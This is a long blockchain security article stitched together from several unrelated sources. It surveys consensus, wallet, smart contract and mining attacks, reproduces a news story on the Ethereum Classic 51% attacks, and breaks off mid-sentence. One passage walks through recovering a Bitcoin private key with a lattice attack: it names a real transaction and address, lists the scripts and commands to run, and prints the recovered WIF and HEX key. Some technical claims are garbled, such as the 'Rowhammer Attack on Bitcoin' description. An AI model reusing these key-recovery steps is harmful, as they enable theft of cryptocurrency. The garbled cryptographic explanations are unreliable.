Proof-of-Stake Systems Long range attacks target networks that use the proof of stake (PoS) consensus algorithm, in which users can mine or validate block transactions according to how many coins they hold. These attacks can be categorized into three types: Simple — A naive implementation of the proof of stake protocol, when nodes don’t check block timestamps Posterior corruption — An attempt to mint more blocks than the main chain in a given time frame Stake bleeding — Copying a transaction from the honestly maintained blockchain to a private blockchain maintained by the attacker When conducting a long-range attack, a hacker uses a purchased or stolen private key of a sizable token balance that has already been used for validating in the past. Then, the hacker can generate an alternative history of the blockchain and increase rewards based on PoS validation. 2. User Wallet Attacks Actually, blockchains and cybersecurity go together like salt and pepper until people interact with them. It may sound surprising, but blockchain users pose the greatest security threat. People know about the use of blockchain in cybersecurity, and tend to overestimate the security of the blockchain and overlook its weaknesses. User wallet credentials are the main target for cybercriminals. To obtain wallet credentials, hackers try to use both traditional methods like phishing and dictionary attacks and new sophisticated methods like finding weaknesses in cryptographic algorithms. Here’s an overview of the most common ways of attacking user wallets. Phishing Attacks In 2018, there was an attack on IOTA wallets initiated with iotaseed.io (now offline), a fake online seed generator. Hackers conducted a phishing campaign with this service and collected logs with secret seeds. As a result, in January 2018, hackers successfully stole more than $4 million worth of IOTA from victims’ wallets. Dictionary Attacks During these attacks, a hacker attempts to break a victim’s cryptographic hash and salt by trying hash values of common passwords like password1. By translating clear text passwords to cryptographic hashes, attackers can find wallet credentials. Vulnerable Signatures Blockchain networks use various cryptographic algorithms to create user signatures, but they may also have vulnerabilities. For example, Bitcoin uses the ECDSA cryptographic algorithm to automatically generate unique private keys. However, it appears that ECDSA has insufficient entropy, which can result in the same random value in more than one signature. IOTA also faced cryptographic problems with its old Curl hash function. Flawed Key Generation Exploiting vulnerabilities in key generation, the hacker known as Johoe got access to private keys provided by Blockchain.info in December 2014. The attack happened as the result of a mistake that appeared during a code update that resulted in poor randomness of inputs for generating public user keys. Though this vulnerability was quickly mitigated, the flaw is still possible with the ECDSA algorithm. Lattice Attack Also, if two nonces ever repeat, no matter what the messages are, an attacker can easily detect this and immediately recover the secret key , again breaking our whole scheme. https://cryptodeeptech.ru/lattice-attack/ In the Bitcoin blockchain, we found a certain transaction: transaction: 08d917f0fee48b0d765006fa52d62dd3d704563200f2817046973e3bf6d11f1f for Bitcoin Addresses: 15N1KY5ohztgCXtEe13BbGRk85x2FPgW8E where using the Python script algorithmLLL.py with the installation of packages in GOOGLE COLAB INSTALL >> SAGE + ECDSA + BITCOIN + algorithm LLL Installation Run Bash script: lattice.sh Result in HEX format Private key found! File: ONESIGN.txt (ECDSA Signature R, S, Z Value) We propagated fake signatures for the Python script algorithmLLL.py File: PRIVATEKEY.txt File: ADDRESS.txt Let’s open bitaddress and check: Checking the private key on the bitaddress website Private key found! https://www.blockchain.com/btc/address/15N1KY5ohztgCXtEe13BbGRk85x2FPgW8E 0.001 BTC ADDR: 15N1KY5ohztgCXtEe13BbGRk85x2FPgW8E WIF: 5JCAmNLXeSwi2SCgNH7wRL5qSQhPa7sZvj8eDwxisY5hJm8Uh92 HEX: 31AFD65CAD430D276E3360B1C762808D1D051154724B6FC15ED978FA9D06B1C1 RangeNonce «RangeNonce» is a script to find the range of the secret key https://cryptodeeptech.ru/kangaroo/ Let’s choose the version for the distribution kit GNU/Linux . Google Colab provides UBUNTU 18.04 RangeNonce Upload all files to Google Colab RangeNonce + Google Colab Let’s allow permissions for the script and run the script «RangeNonce» Teams: chmod +x RangeNonce ./RangeNonce cat Result.txt Everything will be saved to a file: Result.txt result.txt This is the partial disclosure of bytes of information the value of “K” (NONCES) So our secret key is in the range : K = 070239c013e8f40c8c2a0e608ae15a6b00000000000000000000000000000000 K = 070239c013e8f40c8c2a0e608ae15a6bffffffffffffffffffffffffffffffff This is a very serious ECDSA signature error Frey-Rück Attack With a critical vulnerability in the Bitcoin blockchain transaction, we can solve the rather difficult discrete logarithm problem to extract the ECDSA secret key"K" (NONCE) from the vulnerable signature in order to ultimately restore the Bitcoin Wallet, since knowing the secret key we can get the private key. To do this, there are several algorithms from the list of popular attacks on Bitcoin , one of which is “Frey-Rück Attack on Bitcoin” . https://cryptodeeptech.ru/frey-ruck-attack/ Rowhammer Attack The biggest cryptographic strength of the Bitcoin cryptocurrency is a computational method in discrete mathematics that takes the problem of factorization of large integers and the problem of hidden numbers (HNP)in the Bitcoin signature transaction as a basis ECDSA. Rowhammer Attack on Bitcoin, allows us to efficiently find all zeros for normalized polynomials modulo a certain value, and we adapt this method to a signature algorithm, ECDSAmore precisely, to critically vulnerable transactions in the Bitcoin blockchain. We will apply multiplication by different powers of the same element of the finite field, which, oddly enough, can coincide and give us a certain function over the finite field, which can be specified using the Lagrange interpolation polynomial . https://cryptodeeptech.ru/rowhammer-attack/ WhiteBox Attack Differential fault analysis (DFA)was briefly described in the literature in 1996 when an Israeli cryptographer and cryptanalyst Eli Biham and an Israeli scientist Adi Shamir showed that they could use error injection to extract the secret key and recover the private key using various signature and verification algorithms. We implement the “WhiteBox Attack on Bitcoin” with the differential bugs described in this research paper. The classic DFAthat we described in the previous article is called F(). Some of these attacks also require two signature pairs ECDSA. https://cryptodeeptech.ru/whitebox-attack/ Attacks on Cold Wallets Hardware wallets, or cold wallets, can also be hacked. For instance, researchers initiated an Evil Maid attack by exploiting bugs in the Nano S Ledger wallet. As a result of this hack, researchers obtained the private keys as well as the PINs, recovery seeds, and passphrases of victims. One of the latest cold wallet attacks happened in 2019, when the UPbit cryptocurrency exchange was transfering funds to a cold wallet. This is a common way to freeze crypto when you’re expecting a cyberattack. The hackers managed to steal 342,000 ETH, apparently because they knew the timing of the transaction. Attacks on Hot Wallets Hot wallets are internet-connected apps for storing private cryptographic keys. Though owners of cryptocurrency exchanges claim they keep their user data in wallets disconnected from the web, a $500 million attack on Coincheck in 2018 proved this isn’t always true. In June 2019, an attack on GateHub resulted in unauthorized access to dozens of native XRP wallets and the theft of crypto assets. Singapore-based crypto exchange Bitrue also experienced a hot wallet attack at almost the same time due to a system vulnerability. As a result, hackers managed to steal funds worth over $4.5 million in XRP and $237,500 in ADA. Smart Contract Attacks We’ve already accumulated rich experience in analyzing and avoiding vulnerabilities in smart contracts based on the Ethereum, EOS, and NEO platforms. The main blockchain security issues associated with smart contracts relate to bugs in source code, a network’s virtual machine, the runtime environment for smart contracts, and the blockchain itself. Let’s look at each of these attack vectors. PDF: Smart Contract Vulnerability Detection Technique: A Survey The Smart Contract examples used are issues that have occurred on the Ethereum blockchain. They are applicable to any platform that uses the Ethereum Virtual Machine and the concepts can be applied to any form of smart contracts. The topic will also cover known best practices to mitigate these issues. The Topology attacks explore possible attack vectors on the Bitcoin network, and subsequently any networks that rely on a controlled amount of peer-peer communication for validation. The issues explored will be on two levels: Vulnerable Smart Contract codes and Topology attacks. Jorden Seet’s interest in the Cybersecurity world started in 2013 when he competed in his first CTF after a 2-day penetration testing bootcamp. Ever since, he has grown a passion in cybersecurity and explored many facets of it, from Cryptography to Social Engineering. https://youtu.be/LInz2YaDhgQ Currently, he is working on a National Research Foundation – Tel Aviv University (NRF-TAU) granted project on using Network Topology Analytics for Cyber Attack Deterrence in SMU. He was previously with the Cyber Security Agency of Singapore’s Penetration Testing department as an intern and is currently working with BlockConnectors on Smart Contract Audit and Blockchain development. In his spare time, he works on Smart Contract Hacking as well as explore potential blockchain attack vectors. He firmly believes that decentralization is a paradigm that could have real potential in revolutionizing the security industry, such as in DDoS prevention, Data integrity and IoT security. Vulnerabilities in Contract Source Code If a smart contract has vulnerabilities in its source code, it poses a risk to parties that sign the contract. For instance, bugs discovered in an Ethereum contract cost its owners $80 million in 2016. One of the common vulnerabilities in Solidity opens up a possibility to delegate control to untrusted functions from other smart contracts, known as a reentrancy attack. During this attack, contract A calls a function from contract B that has an undefined behavior. In turn, contract B can call a function from contract A and use it for malicious purposes. Vulnerabilities in Virtual Machines Vulnerabilities in virtual machines The Ethereum Virtual Machine (EVM) is a distributed stack-based computer where all smart contracts of Ethereum-based blockchains are executed. The most common vulnerabilities of the EVM are the following: Immutable defects — Blockchain blocks are immutable by nature, which means that once a smart contract is created, it can’t be changed. But if a smart contract contains any bugs in its code, they also are impossible to fix. There’s a risk that cybercriminals can discover and exploit code vulnerabilities to steal Ether or create a new fork, as happened with the DAO attack. Cryptocurrency lost in transfer — This is possible if Ether is transferred to an orphaned address that doesn’t have any owner or contract. Bugs in access control — There’s a missed modifier bug in Ethereum smart contracts that allows a hacker to get access to sensitive functionality in a contract. Short address attack — This is possible because the EVM can accept incorrectly padded arguments. Hackers can exploit this vulnerability by sending specifically crafted addresses to potential victims. For instance, during a successful attack on the Coindash ICO in 2017, a modification to the Coindash Ethereum address made victims send their Ether to the hacker’s address. Also, hackers can compromise smart contracts by applying other methods that are typical for compromising blockchain technology, including DDoS, eclipse, and various low-level attacks. However, younger blockchains such as Cardano and Zilliqa use different virtual machines: IELE, KEVM, and others. These new blockchains claim to guarantee smart contract security within their protocols. Transaction Verification Mechanism Attacks Unlike financial institutions, blockchains confirm transactions only after all nodes in the network are in agreement. Until a block with a transaction is verified, the transaction is classified as unverified. However, verification takes a certain amount of time, which creates a perfect vector for cyberattacks. Double-spending is a common blockchain attack exploiting the transaction verification mechanism. All transactions on a blockchain need to be verified by users in order to be recognized as valid, which takes time. Attackers can use this delay to their advantage and trick the system into using the same coins or tokens in more than one transaction. Figure 2. A double-spending attack Here are the most common types of attacks based on exploiting the intermediate time between a transaction’s initiation and confirmation. Finney Attacks https://cryptodeep.ru/doc/Exploring_the_Attack_Surface_of_Blockchain.pdf A Finney attack is possible when one transaction is premined into a block and an identical transaction is created before that premined block is released to the network, thereby invalidating the second identical transaction. The Finney attack can be termed as an extension of the selfish mining attack. The attacker mines a block stealthily and sends the unconfirmed transaction to the other node, possibly to a merchant node. If the merchant node accepts the transaction, then the attacker can further add a new block to the chain in a small-time frame, reversing that transaction and inducing a double spending attack. The attack window in the case of a Finney attack is considerably small, but this can cause a lot of damage if the value of the transaction is large enough. Race Attacks A race attack is executed when an attacker creates two conflicting transactions. The first transaction is sent to the victim, who accepts the payment (and sends a product, for instance) without waiting for confirmation of the transaction. At the same time, a conflicting transaction returning the same amount of cryptocurrency to the attacker is broadcast to the network, eventually making the first transaction invalid. In a race attack, the attacker does not pre-mine the transaction but simply broadcasts two different transactions, one of them to the merchant and one of them to the network. If the attacker is successful in giving the merchant node the illusion that the transaction received by them is the first one, then they accept it, and the attacker can broadcast a completely different transaction to the entire network. Besides these core blockchain level attacks, there are a number of other attacks that can happen at the application implementation level. One of the most infamous of them was the DAO attack that happened in June 2016, leading to a theft of about $70 million. The attacker contributed to the crowdfunding campaign of a company and requested a withdrawal. However, a recursive function was implemented for the withdrawal that didn’t check the settlement status of the current transaction. To recover the money, the Ethereum chain went into a hard fork, with the old chain continuing on as Ethereum Classic. This severely damaged the reputation of the chain, and the autonomy of the chain also came into question. Some general measures to prevent these attacks from happening: It should be ensured that there are no logical inconsistencies in the chain code and consensus algorithm. The peers should be selected with sufficient complexity and caution, and the transactions should be reviewed regularly. In case any suspicious activity is detected, the network should be vigilant enough to isolate the bad actor node immediately. A proper review process should be deployed for the network for each new node when it joins the network. Rate limiting algorithms should be present at all the relevant processes to limit the damage and prevent attacks as and when they happen. 2FA should be present at all the concerned authentication points, and it should be ensured that all the authentication level bugs should be fixed at the application level itself to the extent possible Most of the time, the approach of blacklisting and whitelisting does not work due to scalability issues. So, a better approach should be to make the attacks costly enough to be performed and increase the complexity of the system to be resilient enough and make successful exploitation extremely difficult. Multiple other bugs and vulnerabilities exist in different kinds of the blockchain networks, the most common and concerning of them being at the smart contract level, but they are a topic for another time. Vector76 Attacks Vector76 is a combination of two previous attacks. In this case, a malicious miner creates two nodes, one of which is connected only to the exchange node and the other of which is connected to well-connected peers in the blockchain network. After that, the miner creates two transactions, one high-value and one low-value. Then, the attacker premines and withholds a block with a high-value transaction from an exchange service. After a block announcement, the attacker quickly sends the premined block directly to the exchange service. It along with some miners will consider the premined block as the main chain and confirm this transaction. Thus, this attack exploits the fact that one part of the network sees the transaction the attacker has included into a block while the other part of the network doesn’t see this transaction. After the exchange service confirms the high-value transaction, the attacker sends a low-value transaction to the main network, which finally rejects the high-value transaction. As a result, the attacker’s account is credited the amount of the high-value transaction. Though there’s a high chance for success with this type of attack, it’s not common because it requires a hosted e-wallet that accepts the payment after one confirmation and a node with an incoming transaction. Alternative History Attacks An alternative history attack — also called a blockchain reorganization attack — may happen even in the case of multiple confirmations but requires a huge amount of computing power from the hacker. In this case, a malicious user sends a transaction to a recipient and at the same time mines an alternative fork with another transaction that returns the same coins. Even if the recipient considers the transaction valid after n confirmations and sends a product, for instance, the recipient may lose money if the attacker releases a longer chain and gets the coins back. One of the latest blockchain reorganization attacks happened to Ethereum Classic in August 2020 when a miner used old software and lost access to internet access for a while when mining. A reorganization happened when two versions of the blockchain competed for validity from nodes in the network and resulted in about a 3000-block insertion. 51% or Majority Attacks A majority attack is possible when a hacker gets control of 51% of the network hash rate and creates an alternative fork that finally takes precedence over existing forks. This attack was initially the only known blockchain vulnerability and seemed unrealistic in the near past. However, at least five cryptocurrencies — Verge, ZenCash, Monacoin, Bitcoin Gold, and Litecoin Cash — have already suffered from 51% attacks. In each of these cases, cybercriminals collected enough hashing power to compromise the network and pocket millions of dollars. The recent 51% attack on Ethereum Classic (ETC) that happened in August 2020 resulted in approximately $5.6 million worth of the ETC cryptocurrency being double-spent. Apparently, the hacker had good knowledge of the ETC protocol and managed to mine 4,280 blocks over four days until the platform noticed an attack. Just five days after the incident, ETC suffered from a second 51% attack, in which a miner conducted a 4,000-block network reorganization. Majority attack Unfortunately, all small cryptocurrencies are still at risk of majority attacks. Since these cryptocurrencies attract fewer miners, attackers can just rent computing power to gain a majority share of the network. The developers of Crypto51 have tried to draw attention to the potential risks of hacking smaller cryptocurrencies. Their website shows the expected costs of a 51% attack on various blockchains. Possible measures for preventing double-spending attacks include monitoring received transactions during a listening period, forwarding double-spending attempts, inserting other nodes to observe transactions, and rejecting direct incoming connections. Moreover, there’s an innovative technology called the lightning network that’s designed to solve the problem of exploiting weaknesses in the transaction verification mechanism. This network allows users to instantly verify transactions through a network of bidirectional payment channels without delegating custody of funds. However, it’s still susceptible to DDoS attacks, one of which already happened in March 2018. 51% attack happens when a particular miner or a set of miners gain more than 50% of the processing power of the entire blockchain network, which helps them gain a majority in regard to the consensus algorithm. This attack vector is primarily related to the Proof of Work algorithm, but it can be extended as a test case to other consensus algorithms also, where there is a risk of a single party gaining enough influence in the network to unduly modify the state of the chain. This can lead to multiple damages including rewriting the chain data, adding new blocks, and double spending. The following diagram shows how this attack happens. In the above visual representation, the red nodes are controlled by the attacker, and they can change the copy of the chain by adding new blocks post gaining majority consensus. Some of the major chains that have suffered a 51% attack are the Bitcoin Gold Blockchain (in May 2018, 388,000 BTG worth around $18 million were stolen from multiple exchanges), Bitcoin Satoshi’s Vision (in August 2021, they suffered a 51% attack after which the coin suffered a 5% loss in value) and the Ethereum Classic blockchain. Rented Hash Power can also lead to 51% attacks. In this method, the attackers can rent computing power on servers to calculate hashes faster than other participants and gain consensus. Mining pools are also an interesting party in this, since they too can sometimes exceed the consensus requirements. In July 2014, the mining pool ghash.io gained more than 50% processing power for a brief period, after which it committed to reducing its power voluntarily. The culprits behind the recent 51% attacks on Ethereum Classic used rented mining hash power to carry off their heists, exploiting a vulnerability common to cryptocurrencies that rely on “proof of work” as their underlying technology. Rented mining hash power is at the center of all three attacks on ETC last month, which resulted in millions of dollars in losses and delivered a significant blow to the reputation of PoW protocols previously believed to be immutable and “unhackable.” “It’s actually a huge vulnerability in the system,” said Terry Culver, CEO of ETC Labs, an incubator of projects on Ethereum Classic, in an interview with Forkast.News. “Three attacks in one month will tell you that security is an issue on Ethereum Classic. And we believe and know that other blockchains get attacked more regularly, maybe with less visibility,” Culver said. “It’s a universal problem.” The cryptocurrency space has been trying to weed out criminals and tighten up security, including the implementation of “know your customer” and anti-money laundering (KYC/AML) procedures, increased regulations from governments, and enhanced security systems to stave off hacking. But despite these efforts, malicious actors continue to exploit a core feature of many blockchain systems — decentralization and the requirement that there must be a 51% consensus of the protocol’s nodes to control the network. “The [cryptocurrency] system is maturing, but the hash rental market is actually growing,” Culver said. “Think of it like, you turn the light on, and where do the mice go? [Malicious actors have] left the exchanges for the most part, and they’ve moved into the hash rental market.” Proponents of PoW systems would say that the 51% requirement needed to gain consensus would make it very hard to hack large blockchain protocols like Bitcoin and Ethereum. But there is still a theoretical possibility if someone or a group manages to gain 51% control over those networks. The risks of a 51% attack increases for smaller cryptocurrencies that don’t have as many nodes, as it would be relatively easier to take over the network of a smaller network while still turning a profit. For example, it would take over US$513,000 to perform a 51% attack (at the time of this publication) for one hour on Bitcoin, but only about US$3,800 for a similar attack on Ethereum Classic, which is why the smaller network may be much easier and more profitable for malicious actors to attack. “The hash rental market is like under a rock somewhere, it’s totally anonymous,” Culver said. “They’re basically money laundering operations. So you could take your BTC from ill-gotten gains, rent hash power, and get out freshly-minted tokens with no provenance.” The cost of launching a 51% attack on various top cryptocurrencies through NiceHash. Image: Crypto51 What does renting hashpower do? How did they do it? The malicious actors behind the first two attacks on ETC in August were able to achieve 51% dominance over the network by renting hash power from NiceHash provider daggerhashimoto, based on an analysis by Bitquery, a data intelligence firm. Slovenia-based NiceHash is an online platform where customers can rent hashing power from sellers providing the computing power to mine cryptocurrencies. By using this rented hash power, the attackers behind the first and second attacks on Ethereum Classic were able to “double spend” over US$7 million by overwriting entries in the blockchain, reversing or even changing the destination of transactions. In other words, the attackers had almost complete control over the network and were able to route money as they pleased. NiceHash has previously been embroiled in controversy. In 2019, its former chief technology officer and co-founder Matjaz Skorjanec was arrested in Germany over U.S. charges of being involved in a hacking group that organized the theft of millions of dollars. NiceHash itself was hacked in 2017, resulting in the loss of an estimated US$78 million in bitcoin. The August hacks were not the first time Ethereum Classic suffered from such breaches, as a similar 51% attack occurred against ETC in January 2019. Hackers have also launched successful 51% attacks on a number of other smaller cryptocurrencies, including Bitcoin Gold, Verge and Monacoin in 2018. “Computers are getting better, it’s going to keep getting easier and easier to get control of the computer power necessary to do these things,” said Benjamin J. A. Sauter, partner at New York-based international law firm Kobre & Kim, which is representing ETC Labs in investigating and suing the hackers. Moreover, the concentration of hashing power in China has also been shown to be a risk for cryptocurrencies, as recent flooding in the country’s Sichuan province destroyed thousands of crypto miners. Sichuan province, which is known for its cheap hydropower, has been a popular location for cryptocurrency mining farms looking to save money, but the floods and landslides caused a distinct drop of BTC hashrate in Chinese mining pools. In a statement addressing the recent attacks and allegations from ETC Labs, NiceHash says that it “does not support or enable 51% attacks” but also concedes that its hash power “might be abused by the attacker’s pool.” NiceHash says it takes steps to prevent or help prevent market disruptions and manipulations, and cooperates with law enforcement conducting investigations on activities which break their terms of service and privacy policy. Forkast.News has reached out to NiceHash for additional comment, but has not received a response as of the time of writing. Self regulation vs government intervention? Despite the hacks and the numerous monetary losses, the crypto community have largely said they prefer to pursue malicious actors privately instead of bringing in greater government regulation and scrutiny. As a result of the attacks on Ethereum Classic, ETC Labs has announced that they are developing a strategic plan to protect the integrity of the ETC ecosystem. The plan includes cooperating with miners to maintain a consistent hash rate on the network, advanced monitoring to identify anomalies or spikes in the hashrate, and eventually changing the PoW mining algorithm. “By and large, I think the space doesn’t want the government to become deeply involved in how the exchanges operate and try to remedy wrongs,” Sauter said. “I think the industry as a whole wants to be able to self-regulate and have an environment where the government doesn’t need to be in the weeds. But as long as there’s not an effective private resolution, it’s how problems are going to be solved.” The cryptocurrency industry has seen increasing government interest, stricter rules and moves toward regulations in recent times, including the U.S.’ Financial Action Task Force’s guidelines for virtual asset service providers like exchanges to include the personal information of people transacting over US$1,000. Another U.S. agency, the Commodity Futures Trading Commission (CFTC) also announced a strategic plan to regulate cryptocurrencies by 2024. The U.S. Security and Exchange Commission (SEC) may also be on track to shift its views on how it determines cryptocurrencies to be securities, according to SEC commissioner Hester Peirce. “Capital markets can transform people’s lives, and so allowing the financial system to reach more people means that we have to really revisit some regulatory features that are in place now,” Peirce said in an interview with Forkast.News. “Crypto is an opportunity for us to be introspective and to say, hey, are we handling innovation right?” Rented hash power might be a new sector where the industry may prefer to resolve disputes privately before the government steps in, Sauter said. “If you don’t [have a framework for private dispute resolution], the only other choice that the victims of frauds have is to go to the government,” Sauter said, adding that those actions led to a wide crackdown on cryptocurrency business by the SEC and CFTC. “The industry would like for the government to take a hands-off approach, but that’s just not going to be a long-term, feasible solution if there’s also no way to figure out who is abusing the system.” To bring the cryptocurrency industry out of the Wild West of scams and hacks that proliferated during the ICO bubble of 2017 would require increasing controls and checks on the system — through government or private organizations. “If there’s a market for renting, I don’t think that itself is a problem,” Sauter said. “But if you’re doing it without keeping track of who your customers are and doing the same kind of due diligence that the exchanges are doing now, so that you’re able to trace back these kinds of frauds and hold people accountable when they abuse it, then you’re part of the problem, not the solution.” NiceHash begs to differ. “Just like ISPs can’t guarantee that all internet traffic is not malicious, NiceHash cannot be responsible for the security of every blockchain infrastructure,” the hash power provider said, in a statement. “The question of security becomes the question of the community and its creators. We must accept that if we want a true decentralization.” Ethereum Classic was besieged in August with three separate instances of 51% attacks that resulted in the disruption of over 10,000 blocks and millions of dollars in losses. “Increasing frustration is definitely the best way to describe it,” said Terry Culver, CEO of ETC Labs, an incubator of projects on Ethereum Classic. Although ETC Labs and other developers are working on ways to protect the blockchain network from further 51% attacks, security concerns regarding transactions have put in question the utility of blockchain networks based on proof of work (PoW), the consensus mechanism used in more cryptocurrencies than any other. “It’s a vulnerability that all proof-of-work blockchains have, even Bitcoin and Ethereum,” said Culver, in an interview with Forkast.News. “We think that they’re secure because of the cost to attack those networks, but the truth is that cost is subjective.” The first of the recent wave of Ethereum Classic’s 51% attacks occurred in early August, when an estimated US$5.6 million of ETC was double-spent — made possible because rented hashpower allowed the individuals to achieve majority control over the network. “The cost to attack one of those networks for a state actor, or even a non-state actor, is trivial,” Culver said. “And in fact, I think those attacks will come.” According to Benjamin J. A. Sauter, partner at New York-based international law firm Kobre & Kim, the attacks were not the result of a technical issue with the ETC blockchain, as reported by other publications, but rather the result of a person or group acting maliciously to commit fraud. “What we want to do is send a message to them: that you’re not going to get away with this, we’re not going to take it sitting down, and we are going to try to figure out who you are,” Sauter said. Culver adds: “And what we are doing now and what we have to continue to do is find ways to make it more secure. For us, it’s not a question of abandoning proof of work; it’s a question of innovating so that we can prevent malicious activity and grow the kind of ecosystem we’re trying to grow.” Watch Culver and Sauter’s full interview with Forkast.News Editor-in-Chief Angie Lau explaining the repeated Ethereum Classic 51% hacks, what these breaches mean for larger PoW blockchains like Bitcoin and Ethereum, whether ‘proof of stake‘ networks offer a superior alternative, and more. Angie Lau: Welcome to Word on the Block, the series that takes a deeper dive into the blockchain and emerging technology stories that shape our world at the intersection of business, politics and economy. I’m Forkast.News Editor-in-Chief Angie Lau. Well, once upon a time, ‘proof of work’ was actually what made the blockchain world go round, as a consensus mechanism made popular by Satoshi Nakamoto’s Bitcoin. Developers have been increasingly concerned about the 51% attack, the proof of work, the silver bullet. Really in the early days, it was theoretical, a hypothetical. Well, in the span of just a couple of months, an attacker has gained more than 50% control of the network’s hash rate, and it has prevented other miners from completing blocks. We’ve seen not one, not two, but three attacks — 51% attacks — on one network, and it’s Ethereum Classic. And so the question is, is this the end of proof of work? What is happening with Ethereum Classic? Highlights Could Ethereum Classic get 51%-hacked again? “Three attacks in one month will tell you that security is an issue on Ethereum Classic. And we believe and know that other blockchains get attacked more regularly, maybe with less visibility. It’s a universal problem.” The nature of proof-of-work blockchains: “We think that they’re secure because of the cost to attack those networks, but the truth is that cost is subjective. The cost to attack one of those networks for a state actor, or even a non-state actor, is trivial.” What allowed these attacks to happen: “So there’s two problems here: one is gaining 51% of the hash power on the network, which allows you to create your own transactions. The other is exchanges, where if their security protocols are not strong enough, an attacker can deposit and withdraw funds very quickly, before the exchange can respond to it.” Despite these losses, the industry still has strong desire for self-regulation: “By and large, I think the space doesn’t want the government to become deeply involved in how the exchanges operate and try to remedy wrongs. I think the industry as a whole wants to be able to self-regulate and have an environment where the government doesn’t need to be in the weeds.” Is it time to move away from proof of work, toward proof of stake? “For us, it’s not a question of abandoning proof of work; it’s a question of innovating so that we can prevent malicious activity and grow the kind of ecosystem we’re trying to grow.” Mining Pool Attacks For major cryptocurrencies like Bitcoin, it has become impossible for individual miners to earn a profit, so miners unite their computing power by creating mining pools. This allows them to mine more blocks and each receive a share of the reward. Currently, the largest Bitcoin mining pools are BTC.com, AntPool, and ViaBTC. Together, they represent more than 52 percent of the total hash rate of the Bitcoin network according to Blockchain.com. Mining pools represent a sweet target. Malicious miners try to get control over mining pools both internally and externally by exploiting common web application vulnerabilities in the blockchain consensus mechanism. Mining pool attacks Selfish Mining Attack Selfish mining refers to the attempts of malicious miners to increase their share of the reward by not broadcasting mined blocks to the network for some time and then releasing several blocks at once, making other miners lose their blocks. Possible measures for preventing this type of attack are random assignment of miners to various branches of pools, preferring the block with a more recent timestamp, and generating blocks within a maximum acceptable time. This type of attack is also known as block withholding. Selfish mining attack As a result of a selfish mining attack on the Eligius pool in 2014, miners lost 300 BTC. Selfish mining has high chances of success and may happen with all cryptocurrencies. Possible preventive measures against selfish mining include registering only trusted miners and making changes to the existing Bitcoin protocol to hide the difference between a partial proof of work and full proof of work. This attack occurs when an attacker is able to mine blocks stealthily and create a copy of the chain that is longer than the common chain being worked upon by the other nodes. The attacker mines some blocks and does not broadcast them to the entire network. They keep mining and then publish a private fork once they are sufficiently ahead of the network in terms of the length of the chain. Since the network will shift to the chain that has been most worked upon (aka the longest chain rule), the attacker’s chain becomes the accepted one. With the help of a selfish mining attack, the attacker can publish some transactions on the public network and then reverse them with the help of stealthily mined blocks. PDF: Security Problem Definition and Security Objectives of Cryptocurrency Wallets Fork after withholding Fork after withholding (FAW) is a variation of selfish mining that turns out to be more rewarding for attackers. During an FAW attack, the malicious miner hides a winning block and either discards it or releases it later to create a fork, depending on the situation. The concept of this attack was explicitly described by a group of researchers led by Ujin Kwon. First of all, you have the core concept of how a blockchain system functions. It is, literally, a chain of “blocks”, where each block is a piece of data that has been cryptographically hashed. Each block of data is a piece of information. In currencies, as a common and elementary example, each block is a transaction. When a user wants to make a transaction, their information is checked against the entire blockchain, to verify that the user indeed has currency available to spend. Once verified, their transaction is sent to miners, who compete to hash the data appropriately and add it to the chain. In manufacturing, blockchain technology may be used to secure sensitive files. If an attacker attempts to intercept those files and manipulate them, the blockchain fingerprint will be missing and those files will be rejected by the blockchain. That cryptography is one part of the equation of security. The cryptography used in a blockchain may vary, but modern cryptography is generally quite difficult to crack without compromising the keys. When learning about blockchain technology, you’ll learn all about how cryptography functions and its purpose. Additionally, the blockchain itself is a stored ledger of all of the data hashed into it. It’s a perfect, immutable transaction history that covers everything from the first action to the most recent action. More importantly, this ledger is not stored in one central location. Instead, it’s distributed between everyone who uses the technology. No one can manipulate this ledger, because they would need to manipulate every instance of it to make them match. This is the consensus protocol. Different blockchain technologies work in different ways specifically, but they all share core elements relating to consensus and the chain of blocks, where individuals block each contains information about itself and the previous block, continuing a chain indefinitely. While security seems immutable, humans are clever creatures, and there have already been a variety of different attacks on blockchain technologies, both actual and theoretical. Blockchain technology is relatively new and complex, and that means there are a lot of people looking at a lot of different angles to figure out how to compromise it. Wherever there’s a potential profit motivation, there will be malicious actors. Indeed, blockchain tech has a lot of potential and actual vulnerabilities, that you will need to be aware of if you’re interested in modern cybersecurity. Blockchain Technology Requires Proper Implementation of High-Quality Cryptography Using high-end cryptographic processes to encode and hash data into a blockchain is great – if they’re implemented properly. It’s easy to treat these technologies as puzzle pieces that fit together, but using them in the wrong way can leave holes that can be exploited. racking the cryptography directly may be rare, but cracking the way it’s put together is a lot easier. Not to mention the possibility of backdoors in the encryption allowing unsavory access. Blockchain Technology Interfaces with Less Secure Technology Blockchain technology itself might be securely designed, but it has to interface with other technology to be useful, and that point of contact can be exploited. There have been dozens of small and large-scale attacks on blockchain systems. Though blockchain extends well beyond cryptocurrency, coin exchanges have been major targets of sophisticated attacks. Attackers don’t have to necessarily compromise the protocol itself when they can simply hack an exchange that has failed to take proper security measures on their servers. Looking for these vulnerabilities can be a golden opportunity for malicious actors, but it’s also proven to be lucrative for white hat hackers who chase bugs for bounties. These bug hunters have identified dozens of problems with various blockchain platforms. One such attack targeted the “smart contract” system used by several digital currencies. In particular, it targeted Ethereum’s blockchain via the exchange Coincheck in Japan. The attack stole around 80 million dollars worth of ether from the exchange. Blockchain’s Permanence for Currencies Blockchain currency benefits are detriments as well. We’ve all read stories of people losing access to hugely valuable digital wallets, what was pocket change years ago became millions and was lost. The anonymity and security of the currency are both seen as a benefit, but for those who find themselves unable to recover a lost wallet, it’s a painful reminder that the technology requires security on both sides of the digital coin. This is also an issue with the inability to insure or refund a transaction. With traditional currency, if some money is stolen from a bank account, a charge-back can rectify the situation and the insured bank takes the hit and is reimbursed. With something like cryptocurrency, if your currency is stolen from a wallet, it’s gone. The transaction cannot be reversed and is not insured. In some cases, this can be rectified with something called a Hard Fork. A hard fork is a forced update to the entire blockchain that “forks” the chain before the theft, rewriting history to look like the theft never happened. The fork where it happened is abandoned, and the new fork becomes reality. Of course, this has its own set of problems; it requires a return to a central authority that can make such decisions, which is then open to further vulnerability. Now, perhaps future iterations of a digital blockchain currency will integrate solutions to this problem, and perhaps that will make other attack vectors appear. The ever-evolving world of blockchain security is what you’ll learn when you study the subject. Consensus Protocols The distributed nature of the blockchain and the fact that the network requires consensus, and thus eliminates simple attempts at manipulation, also opens the technology up to broader forms of manipulation. One speculated issue with blockchain is a majority problem. For example, with cryptocurrencies, a distributed network of miners is required to keep consensus. To change the “history” of a blockchain, an attacker would need to convince the consensus that their reality was the correct one. Normally, this would be impossible. However, as more and more mining moves to 